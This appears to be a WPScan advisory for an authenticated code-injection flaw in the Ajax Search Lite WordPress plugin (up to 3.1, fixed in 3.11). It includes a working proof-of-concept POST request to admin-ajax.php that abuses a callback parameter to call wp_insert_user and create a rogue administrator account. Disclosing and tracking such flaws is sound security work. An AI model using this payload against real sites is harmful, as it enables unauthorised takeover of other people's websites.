Ajax Search Lite <= 3.1 - Authenticated RCE

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Proof of Concept:

This will register an administrator with username "xADMIN" and password "xPASS":

POST request to: /wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput

With POST data:
wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator

Affects

Plugin ajax-search-lite
fixed in version 3.11

References

URL http://web.archive.org/web/20150619084745/http://research.evex.pw/?vuln=9

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Submitter A. Samman
Submitter Twitter Evex_1337
Views 127
Verified No
WPVDB ID 7858

Timeline

Publicly Published 2015-03-18 (over 1 year ago)
Added 2015-03-21 (over 1 year ago)
Last Updated 2016-04-24 (7 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.